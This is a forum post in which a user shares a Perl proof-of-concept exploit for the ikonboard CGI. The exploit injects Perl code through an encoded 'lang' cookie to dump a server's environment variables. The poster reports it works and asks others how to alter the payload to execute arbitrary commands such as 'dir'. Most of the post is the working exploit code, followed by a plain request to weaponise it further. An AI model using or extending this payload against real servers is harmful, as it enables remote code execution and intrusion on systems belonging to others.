| chiche |
| Regular user |
 |
|
| Joined: Nov 11, 2004 |
| Posts: 9 |
|
|
|
 |
|
 |
|
I found a proof of concept for ikonboard:
#!/usr/bin/perl -w
use strict;
my $HOST = 'www.example.com';
my $PORT = 80;
my $PATH = '/cgi-bin/ikonboard.cgi';
my $HEAD = qq|"Content-type: text/plain\r\n\r\n"|;
use IO::Socket;
my $sock = IO::Socket::INET->new("$HOST:$PORT") or die "connect: $!";
my $val =
qq|.\0"if print($HEAD,map"\$_ => \$ENV{\$_}\n",keys\%ENV)&&exit;#|;
$val =~ s#(\W)# sprintf '%%%.2X', ord $1 #ge;
$sock->print(
"GET $PATH HTTP/1.1\r\n",
"Host: $HOST\r\n",
"Cookie: lang=$val\r\n",
"Connection: close\r\n",
"\r\n"
) or die "write: $!";
print while <$sock>;
The exploit works fine, its give me information about the server enviorment.
In the corresponding advisory i read that this can be used to execute arbitrary commands.
I think i have to put them in "if print($HEAD,map"\$ ....
But im not sure and i dont know perl.
PLease if someone can give an example of making some "dir" command or something like that please let me know.
Salu2 desde Uruguay.
chiche.
Fuck the s0ftware patents! |
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 303
Members: 0
Total: 303
